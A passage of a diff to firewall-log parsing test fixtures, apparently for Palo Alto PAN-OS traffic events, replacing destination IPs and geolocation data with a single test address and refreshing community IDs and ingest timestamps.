04:39:56,26138,1,59203,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3508,27 +3504,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -3547,7 +3542,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3581,7 +3576,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:TPp8b1ubMhxmeJWRt0DCagjd7jA=", + "community_id": "1:yprTBHc/3GeEhSAWP96ta1sM430=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -3619,14 +3614,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283995192Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381773Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,27175,1,59305,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3649,24 +3644,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -3685,7 +3682,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3719,7 +3716,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:9xSXx0HsnsbhZkZ6kFjNeIn1Aw8=", + "community_id": "1:H+bw8FHQcsUlyIhoVDQ+NX6rtHg=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -3757,14 +3754,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.283999698Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381778Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26261,1,64005,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3787,24 +3784,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -3823,7 +3822,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -3857,7 +3856,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Ukie7FwgRVUkTl4/hKbkxseBqj0=", + "community_id": "1:m4VFpKOzz62icW8a2e5EDKgI1zQ=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -3895,14 +3894,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284009610Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381782600Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,25022,1,58768,53,0,0,0x200000,udp,allow,69,69,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -3925,27 +3924,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "Westminster", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "California", + "region_name": "Jilin", "location": { - "lon": -117.9932, - "lat": 33.7518 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 20001, + "number": 4837, "organization": { - "name": "Charter Communications Inc" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 13069, "bytes": 504, - "ip": "98.149.55.63", + "ip": "175.16.199.1", "packets": 8 }, "rule": { @@ -3964,7 +3962,7 @@ }, "packets": 8 }, - "message": "192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", "panw": { "panos": { "ruleset": "rule1", @@ -3998,7 +3996,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7+CQvC/DGk2fhUdWzglWwYXYMZE=", + "community_id": "1:ky7+S2LyyKY/u1D67FJdhpe2W6A=", "transport": "udp", "application": "skype", "type": "ipv4", @@ -4036,14 +4034,14 @@ ], "ip": [ "192.168.0.2", - "98.149.55.63", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 125000000000, - "ingested": "2021-09-08T12:38:09.284014858Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,98.149.55.63,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", + "ingested": "2021-12-09T13:43:22.381786200Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,24027,1,47752,13069,0,0,0x200000,udp,allow,1008,504,504,16,2012/04/10 04:37:50,125,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,8,8", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4066,27 +4064,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4105,7 +4102,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4139,7 +4136,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:h+XKHvMK2Oz7QQvaJdhsJWE2c9E=", + "community_id": "1:AYXyX5+VIkDGOJnqe2YBg9tVR5g=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -4177,14 +4174,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284019377Z", - "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381790300Z", + "original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26360,1,59304,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:17.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4207,24 +4204,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4243,7 +4242,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4277,7 +4276,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:x/kpg5sNW5nn7RkabTWPIKsvO58=", + "community_id": "1:Cd7slvnDeq7YQ4faezjJXH9pPks=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -4315,14 +4314,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284023944Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381795700Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:56,26394,1,54533,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4345,27 +4344,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "IT-MI", - "city_name": "Assago", - "country_iso_code": "IT", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", - "region_name": "Milan", + "region_name": "Jilin", "location": { - "lon": 9.1225, - "lat": 45.4087 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8660, + "number": 4837, "organization": { - "name": "Italiaonline S.p.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 9130, - "ip": "212.48.10.58", + "ip": "175.16.199.1", "packets": 10 }, "rule": { @@ -4384,7 +4382,7 @@ }, "packets": 10 }, - "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", "panw": { "panos": { "ruleset": "rule1", @@ -4418,7 +4416,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:GL6UBrkzpi/gQHrUyqxHb1jJeUU=", + "community_id": "1:zfaYkSBxKm6iKieh06sWC2n9e70=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -4456,14 +4454,14 @@ ], "ip": [ "192.168.0.2", - "212.48.10.58", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284032662Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", + "ingested": "2021-12-09T13:43:22.381799700Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:55,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,24917,1,59201,80,0,0,0x200000,tcp,allow,9967,837,9130,20,2012/04/10 04:39:24,1,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,10,10", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4486,27 +4484,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4525,7 +4522,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4559,7 +4556,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6kV576B7jMsBLC62npA6Dgi/zMI=", + "community_id": "1:JLt9t3wJPT2YYVwyev/DS8HhBiQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -4597,14 +4594,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284038780Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381803500Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,22860,1,59303,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:55,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4627,24 +4624,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4663,7 +4662,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4697,7 +4696,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:TuGe54F1FJdU+mNdTf97Ced2UmI=", + "community_id": "1:qRpdg4yASethznAesoylNuToHeo=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -4735,14 +4734,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284043465Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381806800Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:54,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,14146,1,50876,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -4765,24 +4764,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -4801,7 +4802,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:55,25876,1,57657,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -4835,7 +4836,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1yn57zVSr0UsUwbuL7XvzIWMbpM=", + "community_id": "1:jqcZWkGo23kJ04a2XY4ZBsEmSoY=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -4873,14 +4874,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284048251Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 